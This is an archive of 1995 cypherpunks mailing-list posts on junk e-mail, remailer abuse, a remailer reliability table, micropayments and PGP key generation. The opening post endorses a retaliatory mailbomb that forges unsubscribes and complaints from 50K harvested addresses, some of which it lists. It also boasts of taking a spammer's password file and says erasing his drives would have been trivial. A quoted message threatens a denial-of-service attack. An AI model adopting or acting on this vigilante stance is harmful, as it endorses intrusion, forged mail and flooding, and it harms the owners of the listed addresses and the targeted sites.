Sun, 19 Nov 1995, Ray Cromwell wrote: > Is anyone else getting lots of junk e-mail lately? I'm getting all > kinds of direct marketing crap to both of my main accounts and I haven't > posted to usenet in months. I pretty much only post to cypherpunks, and > that is rarely.
And I never put my real email address on web sites that > ask for them. I fear I am on some kind of direct marketing e-mail > "list". I've warned the perpetrators that if I get another ad from > them, they better expect a denial-of-service attack from me on their > site and lots of mail-bombs. I have been told that this is off-topic, but yes. And same conclusion here that someone is passing around an old list. So far, most of the junk email I've received is addressed to jabba at deathstar, an account I haven't used for three years. Most of the other folks around here get junk mail addressed to username at jessica or @mordor, when in fact we all moved to @networking a year ago. I happen to have a little over 50K addresses used by the valleynet.net spammer. I don't see your address on the list, but there are 86 other clark.net addresses, and these: rjc at bayvax.decus.org rjc at mhc.edu rjc at netpoint.net rjc at plaza.ds.adp.com rjc at wells.haystack.edu rjcd85a at prodigy.com rjconn at freenet.calgary.ab.ca rjcook at ns.cencom.net rjcron at most.magec.com rjcsys at cpcug.org I propose a surgical strike mailbomb response -- forge unsubscribes and complaints to postmaster from every one of these 50K addresses I have. I know they've been spammed before; they'd probably agree. To what addresses should I send these unsubscribes? The list of spammed addresses is yours if you can verify who you are and tell me what you're going to do with it. A malicious attack might be justifiable in extreme cases. For example, because of some really, really stupid Web and mail server design flaws, it would have been trivial for me to have erased the entire hard drives of all of the machines at valleynet.net. But I figured picking up his password file and telling all of his customers what I thought of him would be almost as effective while retaining the moral high ground.
-rich From corey at netscape.com Mon Nov 20 04:57:44 1995 From: corey at netscape.com (Corey Bridges) Date: Mon, 20 Nov 1995 20:57:44 +0800 Subject: remailer abuse Message-ID: <199511200524.VAA00445@netscape.com> At 05:27 PM 11/19/95 -0800, Greg Broiles wrote: >... > If A wants to send >messages to B, but B doesn't want to receive them, should A be forced to >stop sending? My rambling $.02: I haven't thought all this through, but I have an emerging stance. Just this week I've started ploughing through the Cyphernomicon, and was smacked in the face with the eminently pragmatic Mr. May's statement that any law that cannot be enforced should not exist. Up until, say, this week, I'd always been in favor of Caller ID. I'd figured if anyone wants to call me, I have the right to know who it is. By default, I had adopted this position concerning email. Now, one day I will receive an anonymous email. Will I be offended? Maybe. Can I do anything about it? Not likely. Anonymous communication is only going to get easier. Current congressional prattling notwithstanding, the onus of responsibility will have to shift to the recipient. For example, I could configure my mail program to automatically throw away any incoming message with "anonymous" in the "From" header. (Or any message from *@pseudo.goldenbear.com, for that matter) If junk mail continues to bother people, it's only a matter of time until mail programs' filtering capabilities become much more sophisticated. (Of course, for all I know, there already ARE programs that do what I'm about to propose.) People can maintain a "do not accept from" list, containing every anonymous remailer they've ever heard about, or an "accept only from" list, containing just the people they wish to converse with. I think it's this second option that will become increasingly important. Sure it's your right to send me whatever the hell you like, just as it's my right to ignore you completely. 
Bringing this back to my hobby-horse of Caller ID, you end up with even greater protection than an unlisted number--let the whole world know my number--no one'll get through unless I already know him. And then in the brave unregulated future, if you make a new friend, you merely swipe his public-key business card through your PDA, which adds it to your "accept calls and emails from" list. And to take a stab at another pair of Greg's questions, if A is sending messages from his account on X's system to B, and B doesn't want to receive them, should B have the right to make X stop A? No. (Not that I think the law is going to realize that any time soon.) Should X have the right to stop A? Hell yes--it's his system. Let A find a more open-minded ISP if he doesn't like it. Corey Bridges Security Scribe Netscape Communications Corporation 415-528-2978 From tcmay at got.net Mon Nov 20 05:00:33 1995 From: tcmay at got.net (Timothy C. May) Date: Mon, 20 Nov 1995 21:00:33 +0800 Subject: Paid Delivery (was Re: remailer abuse) Message-ID: At 5:21 AM 11/20/95, Corey Bridges wrote: >At 05:27 PM 11/19/95 -0800, Greg Broiles wrote: >>... >> If A wants to send >>messages to B, but B doesn't want to receive them, should A be forced to >>stop sending? > >My rambling $.02: > >I haven't thought all this through, but I have an emerging stance. Just this >week I've started ploughing through the Cyphernomicon, and was smacked in >the face with the eminently pragmatic Mr. May's statement that any law that >cannot be enforced should not exist. Thanks. It's always heartening to see that someone is affected positively by one's arguments. >Up until, say, this week, I'd always been in favor of Caller ID. I'd figured >if anyone wants to call me, I have the right to know who it is. By default, >I had adopted this position concerning email. Now, one day I will receive an >anonymous email. Will I be offended? Maybe. Can I do anything about it? Not >likely. 
Anonymous communication is only going to get easier. Current Yes, anonymous communication is getting easier, and the costs of trying to stop it are becoming impossibly high. It would essentially require a police state to stop, and even then it probably couldn't be stopped...for example, I could always set up a "Tim's Quoting Service," which passes on anonymous mail to a recipient with the "Hey, someone says this..." Could I be prosecuted? Not even in a police state. Just one of dozens of approaches to skirt such laws. However, anticipating your next point, this does not mean anonymous communication bandwidth will become infinite. Solutions are predictable. See below. >congressional prattling notwithstanding, the onus of responsibility will >have to shift to the recipient. For example, I could configure my mail >program to automatically throw away any incoming message with "anonymous" in >the "From" header. (Or any message from *@pseudo.goldenbear.com, for that >matter) > >If junk mail continues to bother people, it's only a matter of time until >mail programs' filtering capabilities become much more sophisticated. (Of >course, for all I know, there already ARE programs that do what I'm about to >propose.) People can maintain a "do not accept from" list, containing every >anonymous remailer they've ever heard about, or an "accept only from" list, Many of us do this all the time. The Macintosh (and Windows) mail program I currently use is "Eudora Pro," from Qualcomm. Extensive filtering options. Certainly it is possible to set up filters to put mail from "anonymous" into mailboxes, or the trash. And just as possible, though a bit more involved, to put mail from _desired_ sources into boxes, or have a priority flag raised, etc. What if one is "bombarded" by mail, thousands of messages a day, or many megabytes? There are two main options, besides meaningless clamoring for legislation against "junk mail": 1. 
Some services, like Prodigy, allow one to discard a message before reading it, with no charge. (Seeing the sender and message name only.) This does not solve the problem completely, but it certainly eliminates cost to the end user. The service provider still has the mail, but at least his network connections are likely to not be much affected....still possible to bring the service to its knees, which brings up the second approach....: 2. Sender pays the costs of transmission. That is, if someone wishes to send 10 megabytes to a site, at least _he_ (or _she_) pays the freight. This is of course the way things now work with the U.S. postal system, with "Postage Due" no longer common: if the sender doesn't In the real world, nothing is really free, so the whole economics of the Internet has been deceiving for quite some time. The notion that one can "spam" for free, shipping megabytes to thousands of sites, has led to strange notions about the economics of the Net and, as a result, to calls for new laws about "unwanted e-mail," "spamming," etc. Of course, most users on the Net are now paying for connectivity one way or another. Even U.C. Berkeley, one of the pioneers in Unix and campus connections to the Net, has subcontracted out its Net connections to Netcom, with students and faculty paying around $15 a month. A sign of the times. (There are also reasons why at least so far it has proven viable to _not_ charge for individual transmissions. Various kinds of subsidies.) Filtering is a solution for the reader not to have to see stuff he doesn't want to see, but he or his ISP may still receive the stuff, even if it gets discarded, which is why the long term solution is likely to involve paid deliveries. (Needless to say, this is not currently part of the Net, and I'm not suggesting it will happen anytime soon, or because I happen to think it's a solution.
Rather, what I'm saying is that it's a _technological_ and _market_ solution to the "problem" of spammage and "unwanted mail filling up our mailboxes." How it happens is unclear. But think of how markets generally evolve to deal with what would naively be seen as unsolvable crises or shortages. Long before we all are getting gigabytes of unwanted stuff every day, alternatives will develop. I am confident that paid delivery is one of the keys.) >And to take a stab at another pair of Greg's questions, if A is sending >messages from his account on X's system to B, and B doesn't want to receive >them, should B have the right to make X stop A? No. (Not that I think the >law is going to realize that any time soon.) Should X have the right to stop >A? Hell yes--it's his system. Let A find a more open-minded ISP if he >doesn't like it. Amen. Exactly. >Corey Bridges >Security Scribe >Netscape Communications Corporation ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Interesting. And now I'm even happier to have partly made a convert. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From anonymous-remailer at shell.portal.com Mon Nov 20 05:41:42 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Mon, 20 Nov 1995 21:41:42 +0800 Subject: WRITTEN CODE Message-ID: <199511201316.FAA09442@jobe.shell.portal.com> On Sat, 18 Nov 1995 s1113645 at tesla.cc.uottawa.ca wrote: > Curious, where is uncg.edu? 
Your French name doesn't make me think you're > in the States (as an .edu address might suggest, but then not necessarily > either). (univ of Calgary?) I think the University of Calgary is actually in the .ca domain. It's a Canadian address. It's just like your very own domain. Your machine tesla is on uottawa.ca. Your University of Ottawa address is not in .edu, but is in .ca. It's interesting though, that you brought up Calgary. Calgary, as I assume our Ottawa poster knows, was very busy over the last week. Grand Central station. All of the politicos seemed to transit the city. Reform Party Leader, Preston Manning, and Conservative Party Leader, Jean Charest, held duelling fund-raising dinners this last Wednesday in Calgary. And Canada's ambassador to the United States, the Prime Minister's nephew -- Raymond Chretien -- left Washington and spoke to the Calgary Chamber of Commerce about NAFTA on Friday. Chretien was particularly troubled by remarks from Senate Majority Leader Bob Dole, about wanting to re-open Chapter 19 in the NAFTA. Following his Chamber of Commerce address, Chretien was quoted as saying, "For us, Chapter 19 is the heart of NAFTA. And this dispute mechanism has been put in there to take into account the fact that we are a much smaller economy, a much smaller country. We have to rely on those tri-national panels to defend our interests." Chretien for now is chalking up the threatening comments to political posturing in the run-up to the presidential election next year, otherwise he said, "we will have a serious problem." Chretien also played down security concerns after a knife-wielding intruder broke into his uncle's (the Prime Minister's) home at 24 Sussex. Despite living in Washington, D.C., Chretien said he doesn't fear for his public safety. When he was asked about the lack of visible protection during his visit to Calgary, he said: "I'm just a humble public servant." Alice de 'nonymous ... ...just another one of those... P.S.
This post is in the public domain. C. S. U. M. O. C. L. U. N. E.
From raph at CS.Berkeley.EDU Mon Nov 20 07:12:12 1995
From: raph at CS.Berkeley.EDU (Raph Levien)
Date: Mon, 20 Nov 1995 23:12:12 +0800
Subject: List of reliable remailers
Message-ID: <199511201450.GAA11841@kiwi.cs.berkeley.edu>

I operate a remailer pinging service which collects detailed information about remailer features and reliability.

To use it, just finger remailer-list at kiwi.cs.berkeley.edu

There is also a Web version of the same information, plus lots of interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

This information is used by premail, a remailer chaining and PGP encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

For the PGP public keys of the remailers, finger pgpkeys at kiwi.cs.berkeley.edu

This is the current info:

REMAILER LIST

This is an automatically generated listing of remailers. The first part of the listing shows the remailers along with configuration options and special features for each of the remailers. The second part shows the 12-day history, and average latency and uptime for each remailer. You can also get this list by fingering remailer-list at kiwi.cs.berkeley.edu.

$remailer{"extropia"} = " cpunk pgp special";
$remailer{"portal"} = " cpunk pgp hash";
$remailer{"alumni"} = " cpunk pgp hash";
$remailer{"bsu-cs"} = " cpunk hash ksub";
$remailer{"c2"} = " eric pgp hash reord";
$remailer{"penet"} = " penet post";
$remailer{"ideath"} = " cpunk hash ksub reord";
$remailer{"hacktic"} = " cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = " cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = " cpunk pgp hash filter";
$remailer{"mix"} = " cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"syrinx"} = " cpunk pgp hash cut reord mix post";
$remailer{"ford"} = " cpunk pgp hash ksub";
$remailer{"hroller"} = " cpunk pgp hash latent ek";
$remailer{"vishnu"} = " cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = " cpunk hash mix";
$remailer{"replay"} = " cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = " cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = " mix cpunk pgp hash latent cut";
$remailer{"ecafe"} = " cpunk mix";
$remailer{"wmono"} = " cpunk mix pgp. hash latent cut ek";
$remailer{"shinobi"} = " cpunk mix pgp. hash latent cut ek reorder";

catalyst at netcom.com is _not_ a remailer.
lmccarth at ducie.cs.umass.edu is _not_ a remailer.
usura at replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(robo syrinx c2)
(flame hacktic replay)
(alumni portal)

Use "premail -getkeys pgpkeys at kiwi.cs.berkeley.edu" to get PGP keys for the remailers. Fingering this address works too.
remailer  email address                    history       latency   uptime
-----------------------------------------------------------------------
ecafe     cpunk at remail.ecafe.org          --*+* *+* .-  3:47:29   99.20%
robo      robo at c2.org                     #** *##+ ##   1:57      99.04%
hacktic   remailer at utopia.hacktic.nl      *** ***+* **  9:23      98.98%
spook     remailer at valhalla.phoenix.net   ++* ** +* **  19:50     98.83%
wmono     wmono at valhalla.phoenix.net      ++* ***+* *   12:53     98.69%
rmadillo  remailer at armadillo.com          ++++++ ++ ++  36:16     98.69%
hroller   hroller at c2.org                  ##+ ##        :51       98.68%
mix       mixmaster at remail.obscura.com    ----+-+ + -   1:13:12   98.54%
flame     remailer at flame.alias.net        *** * +* *    17:08     98.26%
replay    remailer at replay.com             ++* **        7:26      98.05%
portal    hfinney at shell.portal.com        * +* ##       3:56      97.99%
vishnu    mixmaster at vishnu.alias.net      **+** + *     16:08     97.79%
bsu-cs    nowhere at bsu-cs.bsu.edu          #** *#-+* #   3:17      97.03%
ideath    remailer at ideath.goldenbear.com  ------- - -   6:03:13   95.95%
penet     anon at anon.penet.fi              -----..- -    11:16:54  95.74%
alumni    hal at alumni.caltech.edu          *+* + ++ #    5:01      95.02%
ford      remailer at bi-node.zerberus.de    _ _-.-+ +++   17:34:27  92.75%
extropia  remail at extropia.wimsey.com      -..-- -----   5:46:08   92.40%
c2        remail at c2.org                   +++ + + +     53:15     91.60%
rahul     homer at rahul.net                 -**+*#++* *   8:22      97.99%
syrinx    syrinx at c2.org                   +- ++         5:13:50   28.61%

History key
* # response in less than 5 minutes.
* * response in less than 1 hour.
* + response in less than 4 hours.
* - response in less than 24 hours.
* . response in more than 1 day.
* _ response came back too late (more than 2 days).

cpunk    A major class of remailers. Supports Request-Remailing-To: field.
eric     A variant of the cpunk style. Uses Anon-Send-To: instead.
penet    The third class of remailers (at least for right now). Uses X-Anon-To: in the header.
pgp      Remailer supports encryption with PGP. A period after the keyword means that the short name, rather than the full email address, should be used as the encryption key ID.
hash     Supports ## pasting, so anything can be put into the headers of outgoing messages.
ksub     Remailer always kills subject header, even in non-pgp mode.
nsub     Remailer always preserves subject header, even in pgp mode.
latent   Supports Matt Ghio's Latent-Time: option.
cut      Supports Matt Ghio's Cutmarks: option.
post     Post to Usenet using Post-To: or Anon-Post-To: header.
ek       Encrypt responses in reply blocks using Encrypt-Key: header.
special  Accepts only pgp encrypted messages.
mix      Can accept messages in Mixmaster format.
reord    Attempts to foil traffic analysis by reordering messages. Note: I'm relying on the word of the remailer operator here, and haven't verified the reord info myself.
mon      Remailer has been known to monitor contents of private email.
filter   Remailer has been known to filter messages based on content. If not listed in conjunction with mon, then only messages destined for public forums are subject to filtering.

Raph Levien
From s1113645 at tesla.cc.uottawa.ca Mon Nov 20 07:30:22 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Mon, 20 Nov 1995 23:30:22 +0800 Subject: [noise] country domains In-Reply-To: <199511201316.FAA09442@jobe.shell.portal.com> Message-ID: On Mon, 20 Nov 1995 anonymous-remailer at shell.portal.com wrote: > I think the University of Calgary is actually in the .ca domain. > > It's a Canadian address. It's just like your very own domain. Your > machine tesla is on uottawa.ca. Your University of Ottawa address is not > in .edu, but is in .ca. True, but as the folks with the export-controlled ftp sites can tell you, you can pretty much register as anything. Eg. U of Toronto has .edu addresses and .ca's, some of my friends around here have .net addresses, and I assume anyone anywhere in the world can probably get something like, .com, .net, .org (.edu's strictly controlled, isn't it?). (I even know someone in Montreal whose company machine is in .se since he works for Ericson (sp?)
or somesuch Scandinavian company). Which is another spit in ITAR's face, or which meant that Tim wasn't able to get PGPfone from MIT (the prog couldn't figure out if his .net address was in the US) and had to get it off an illegal usenet post. From norm at netcom.com Mon Nov 20 07:51:31 1995 From: norm at netcom.com (Norman Hardy) Date: Mon, 20 Nov 1995 23:51:31 +0800 Subject: Good Enough? Message-ID: At 1:24 PM 11/14/95, Derek Atkins wrote: >Hi. > >First, I must warn you that generating keys on behalf of users is in >general a very bad thing to do. Instead, you might want to provide a >simple way for users to generate keys and get them certified. The >biggest problem is that there is not an easy way to get a good set of >random numbers on a server platform. On the other hand, users can get >a great deal of randomness on their own client machines. If they can >run netscape, then they can run PGP. .... I don't like to harp on this but you have stated the scenario so clearly, that I ask: If the user cannot trust you to generate keys for him, why should he trust the code that you provide to him? That code can have errors like the old Netscape code except planted on purpose so that the private key is guessable in 2^40 tries. There are two answers, I think. The code is public and the user hopes that any flaws will be publicized. The second is to use keyed information (not timing but character information) to provide the random seed. That is the idea behind my post a few weeks ago: "Using deterministic programs to select private RSA keys" Some may find that method less hazardous than trusting the culture of publishing flaws in code. I can forward that posting to anyone interested.
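The second answer in the message above, seeding key selection from typed characters so that the result is deterministic and can be cross-checked, sketched as an added example (it is not Norman Hardy's program, and the post he refers to is not reproduced here). The SHA-256 counter stream, the seed label and all function names are assumptions of this sketch; `seed_bits=40` models a generator with the planted 2^40 weakness so that the comparison can be seen to expose it.

```python
"""Deterministic RSA key selection from typed characters (added sketch)."""
import hashlib
from math import gcd

E = 65537
SMALL_PRIMES = [p for p in range(3, 2000, 2)
                if all(p % q for q in range(3, int(p ** 0.5) + 1, 2))]


class HashStream:
    """Byte stream SHA-256(seed || counter) for counter = 0, 1, 2, ..."""

    def __init__(self, seed: bytes):
        self.seed, self.counter, self.buf = seed, 0, b""

    def read(self, n: int) -> bytes:
        while len(self.buf) < n:
            block = self.seed + self.counter.to_bytes(8, "big")
            self.buf += hashlib.sha256(block).digest()
            self.counter += 1
        out, self.buf = self.buf[:n], self.buf[n:]
        return out


def is_probable_prime(n: int, stream: HashStream, rounds: int = 40) -> bool:
    """Miller-Rabin with bases drawn from the same deterministic stream."""
    d, s = n - 1, 0
    while d % 2 == 0:
        d, s = d // 2, s + 1
    nbytes = (n.bit_length() + 7) // 8
    for _ in range(rounds):
        a = 2 + int.from_bytes(stream.read(nbytes), "big") % (n - 3)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def derive_prime(stream: HashStream, bits: int) -> int:
    """Next prime candidate from the stream that passes all checks."""
    while True:
        c = int.from_bytes(stream.read(bits // 8), "big")
        c |= (3 << (bits - 2)) | 1          # top two bits set, odd
        if any(c % p == 0 for p in SMALL_PRIMES):
            continue
        if gcd(c - 1, E) != 1:              # e must be invertible mod p-1
            continue
        if is_probable_prime(c, stream):
            return c


def derive_rsa_key(typed: str, bits: int = 2048, seed_bits: int = 256):
    """Key is a pure function of the typed characters: no clock, no hidden RNG.

    The typed text is the only secret input, so it must carry the entropy.
    seed_bits below 256 models a generator that quietly discards entropy.
    """
    digest = hashlib.sha256(b"typed-rsa-seed\0" + typed.encode("utf-8")).digest()
    stream = HashStream(digest[: seed_bits // 8])
    p = derive_prime(stream, bits // 2)
    q = derive_prime(stream, bits // 2)
    while q == p:
        q = derive_prime(stream, bits // 2)
    n = p * q
    d = pow(E, -1, (p - 1) * (q - 1))
    return n, E, d


def fingerprint(n: int) -> str:
    """Short digest of the modulus, safe to compare between machines."""
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return hashlib.sha256(raw).hexdigest()[:16]


def cross_check(typed: str, generators) -> bool:
    """True when every independently supplied generator selects the same key."""
    prints = {fingerprint(g(typed)[0]) for g in generators}
    return len(prints) == 1


if __name__ == "__main__":
    sample = "constructed sample input: words the user typed"   # constructed
    honest = lambda t: derive_rsa_key(t, bits=1024)
    weakened = lambda t: derive_rsa_key(t, bits=1024, seed_bits=40)
    print("two honest builds agree:   ", cross_check(sample, [honest, honest]))
    print("weakened build is detected:", not cross_check(sample, [honest, weakened]))
```

A generator that mixes in hidden randomness gives a different key on every run, so there is nothing to compare it against; the deterministic form is what makes the check possible.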
From ncognito at gate.net Mon Nov 20 08:06:33 1995 From: ncognito at gate.net (Ben Holiday) Date: Tue, 21 Nov 1995 00:06:33 +0800 Subject: remailer abuse In-Reply-To: <199511200127.AA17430@ideath.goldenbear.com> Message-ID: On Sun, 19 Nov 1995, Greg Broiles wrote: > I think adopting a submissive or apologetic stance with respect to the > operation of a remailer is a mistake. What we do is protected by the First > amendment, supports a 200+ year tradition of anonymous political speech in > America, provides a valuable service to a worldwide community, and can help > avoid the very abuse they are accused of facilitating. The child who was the [extremely lucid comments clipped to save bandwidth] Agreed, wholeheartedly. The above paragraph would be a perfect candidate for wide dissemination across the net. The facts are that to eliminate the "abusive" mail would require crippling the remailer system to an unacceptable degree. Therefore we as operators are in a position of being forced to either tolerate messages that we may disagree (strongly) with, shut down the remailers, or resort to inadequate 40bit encryption and pseudo-anonymous Penet.fi remailing. (no offense to Julf intended..) I see nothing submissive or apologetic about pointing this fact out in a focused and organised way. In fact, making this fact plain might actually limit the number of people using the remailers to harass other users. If general opinion is that remailer operators accept and condone /all/ forms of communication, without regard for its potential effects, why shouldn't the spammer take advantage of our generosity? Certainly being PC should not be the primary consideration in any undertaking, but the United States (and other nations) have well paid and well organised spin doctors working to convince the public that cryptographers and remail operators are "bad" people whose only purpose is to aid pedophiles and other criminals in carrying out their dastardly deeds.
Ignoring the political implications of operating a remailer is simply foolish. Public opinion is going to be an important consideration when the laws come to the table. Sure, we could move the remailers off shore, but why do that unless we have to? The idea of being a "cryptorebel", or an underground warrior for peace and privacy is certainly romantic, but I'd like to think that it doesn't have to be that way. Then again, I didn't need propaganda to convince me that I needed privacy. Maybe I'm just strange.. From tcmay at got.net Mon Nov 20 08:38:14 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 21 Nov 1995 00:38:14 +0800 Subject: Micropayments article? Message-ID: At 1:46 AM 11/20/95, Lucky Green wrote: >Would someone please send me a pointer to the micropayment article? http://theory.lcs.mit.edu/~rivest/ I am copying the list because, perhaps counterintuitively, it will save bandwidth and overall effort. The reasons are left as an exercise in game theory for the student. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From shamrock at netcom.com Mon Nov 20 09:18:21 1995 From: shamrock at netcom.com (Lucky Green) Date: Tue, 21 Nov 1995 01:18:21 +0800 Subject: Micropayments article? Message-ID: Would someone please send me a pointer to the micropayment article?
TIA, From raph at c2.org Mon Nov 20 09:18:23 1995 From: raph at c2.org (Raph Levien) Date: Tue, 21 Nov 1995 01:18:23 +0800 Subject: Design proposal: crypto-capable generic interface In-Reply-To: <199511192347.PAA07661@tess-turbo.mit.edu> Message-ID: On Sun, 19 Nov 1995, Derek Atkins wrote: > What do you mean by "technically superior"? What technical merits > does MOSS have over PGP? It does have a better protocol with which to > integrate it into mailers, but it is only a transmission protocol, not > a security mechanism change. Worse, MOSS uses X.509, which requires a > lot of overhead for certificates. Ah, I was hoping that my statement would stir some controversy. I've learned that well thought out, carefully reasoned posts never get any response. I agree with you that the X.509 stuff is extra baggage in MOSS. Fortunately, the use of X.509 is optional. MOSS has two very large advantages over PGP: 1. It can operate without temp files. 2. It has no non-MIME variant. It will take forever for PGP/MIME to catch on. Thus, PGP will never really be a suitable candidate for my generic interface. Ah well. > On the other hand, the MIME-PGP protocol can provide the same > integration functionality as MOSS and still allow the use of the > simple PGP certification structure that already exists. This is true. I hope it happens. > -derek > Raph From greg at ideath.goldenbear.com Mon Nov 20 09:21:52 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Tue, 21 Nov 1995 01:21:52 +0800 Subject: remailer abuse Message-ID: <199511200127.AA17430@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- Remailers exist (at least mine does) to make possible the dissemination of unpopular views. "Unpopular" depends on context; so does "abuse". The line between "unpopular" and "abuse" is difficult to draw. On the one hand, the recent "Mr. 
Pedophile" message seemed intended to make the recipient uncomfortable or offended probably because of illegitimate reasons (purportedly, pedophilia). Other messages which cause complaints seem to be responses to something that the "victim" has done or said somewhere else. It's tempting to say that a message which lays out in logical fashion coherent arguments explaining why the "victim's" original message is wrong is likely to cause discomfort or embarassment but is legitimate, while a message which says, to quote from a complaint message I received this weekend, "Fuck you asshole. I hope you choke on your son's sperm." isn't legitimate even though it may also cause discomfort or embarassment. So I guess it's not so much a message's effect upon its recipient (or its intended effect) which is legitimate or illegitimate as it is the message's means of doing so. And that seems really tough to judge, where a remailer operator doesn't know the context in which a message is sent. (I do think it's possible that the "Mr. Pedophile" message was sent by another child or teenager intending to torment the target, not by an actual pedophile. It's possible that the sender was the target himself. It's also possible that the sender was an actual pedophile or a child-hostile adult, but that's not the only plausible explanation. People do strange, strange stuff.) In a situation where person A uses system X to send messages to person B who uses system Y, I'm not sure what B can expect from the system operator of system X. (I'm thinking about net custom here, not law.) If A wants to send messages to B, but B doesn't want to receive them, should A be forced to stop sending? Does X have an obligation to make A stop? Does X have an obligation to modify his system such that messages from A to B are automagically suppressed? Does X have an obligation to refuse service to A (and forego payment for service from A) if A won't stop sending to B? 
Is the answer different if B doesn't want the messages because they (are likely to) contain profanity? or because they are from a person of the wrong religion? or because they're hostile or argumentative? As a first response I'm likely to say that if A knows (or should know, or can guess and be pretty certain of the result) that B doesn't want to get a particular message, A shouldn't send it. But then I realize that there are a number of exceptions - what about if A's message to B is in response to a spam or otherwise inappropriate message from B? what about where B owes A money? or if B has said something ridiculous or stupid and A is writing to correct B? I think that there wouldn't be many inappropriate posts sent to the C-punks list, for example, if everyone who thought a post was inappropriate (not just factually arguable, or uninteresting) sent a message to that effect; the impact of just a few hundred such messages in reply to a single message would likely be burdensome enough to make the sender think twice before sending again. But that inconvenience is anticipated by (and motivates) the senders of those hundreds of messages. I still don't think it's wrong to send the messages. I guess my point is that eliminating "abuse" is pretty much impossible because abuse is in the eye of the beholder. I don't think we need to rely on the mercy or good graces of the net at large, though - remailers will likely prove to be as difficult to eliminate as spammers have been. The net is too big to be centrally policed, and individual providers often have an incentive to tolerate behavior otherwise frowned upon because they're being paid to do so. (and if they begin content filtering they may lose any sort of quasi-common-carrier status they might enjoy now, viz _Cubby v. Compuserve_, etc.) 
Even if the United States adopts rules requiring messages be identified as to the sender, it won't be possible to eliminate overseas remailers - and I imagine that folks would just start up pseudonymous remailers. (I've worked on some prototype code and will deploy a pseudonymous remailer - where people get names like "fjones at pseudo.goldenbear.com " instead of "an12345 at pseudo.goldenbear.com ", in order to divert or confuse anti-anonymous policies or programs.) I think adopting a submissive or apologetic stance with respect to the operation of a remailer is a mistake. What we do is protected by the First amendment, supports a 200+ year tradition of anonymous political speech in America, provides a valuable service to a worldwide community, and can help avoid the very abuse they are accused of facilitating. The child who was the target of the "Mr. Pedophile" message(s) should have been taught how to use remailers and how to maintain his privacy on the net so that, if he really is the victim of some sort of random child stalker, it won't happen again. There's no reason why any child should post to the net under their real name, or why their messages should be traceable to their physical bodies. If we're concerned about protecting kids from bad people who might reach them via the net, we need to teach kids how to send untraceable and unreplyable messages; how to send messages and do business on the net without allowing hostile or unscrupulous people to track them down; and how to make good choices about revealing personal information only to people who have a good reason to know it. People who are the targets of abusive messages or are concerned about abusive messages are some of the people who need remailers and need pro-privacy network tools the most. Giving in to a knee-jerk anti-privacy reaction only reinforces the erroneous notion that security is created by an enforced lack of privacy. 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMK/ZRn3YhjZY3fMNAQHQkQQAmLlRGcwEbJyhb9dYm3dx/BoRj0NBTUr3 MOmRkP2+AtdCKL8gcaWhnY9TeXHj7enezo5TF8ooqvcOLEha29mL9Q+G08t2pkoM SGHr79Yr38syc6Mf+1pXAN7T1Dn600xgnJsDmrFFoQI5H0ZSeA6oLT3ShzhWpsJ/ 3FuNvR7TyLg= =nsOZ -----END PGP SIGNATURE----- From dreschs at mpd.tandem.com Mon Nov 20 09:41:31 1995 From: dreschs at mpd.tandem.com (Sten Drescher) Date: Tue, 21 Nov 1995 01:41:31 +0800 Subject: remailer abuse In-Reply-To: <199511200524.VAA00445@netscape.com> Message-ID: <199511201708.LAA17184@galil.austnsc.tandem.com> Corey Bridges said: CB> If junk mail continues to bother people, it's only a matter of time CB> until mail programs' filtering capabilities become much more CB> sophisticated. (Of course, for all I know, there already ARE CB> programs that do what I'm about to propose.) People can maintain a CB> "do not accept from" list, containing every anonymous remailer CB> they've ever heard about, or an "accept only from" list, containing CB> just the people they wish to converse with. Well, it might not be luser-friendly, but procmail does that:

    # "do not accept from" list: matching mail is discarded
    :0
    * (^From|^Sender|^TO).*(junk|mail|list)
    /dev/null

    # "accept only from" list: matching mail is filed in wanted.mail
    :0
    * (^From|^Sender|^TO).*(send|me|mail|list)
    wanted.mail

-- #include /* Sten Drescher */ To get my PGP public key, send me email with your public key and Subject: PGP key exchange Key fingerprint = 90 5F 1D FD A6 7C 84 5E A9 D3 90 16 B2 44 C4 F3 From Chris.Claborne at SanDiegoCA.ATTGIS.com Mon Nov 20 09:44:38 1995 From: Chris.Claborne at SanDiegoCA.ATTGIS.com (Chris Claborne) Date: Tue, 21 Nov 1995 01:44:38 +0800 Subject: "Junk E-Mail" Message-ID: <9511201710.AA25590@toad.com> At 06:47 PM 11/19/95 -0500, you wrote: > > Is anyone else getting lots of junk e-mail lately? I'm getting all >kinds of direct marketing crap to both of my main accounts and I haven't >posted to usenet in months. On a related note, Compuserve had a note on their system last week from the sysop.
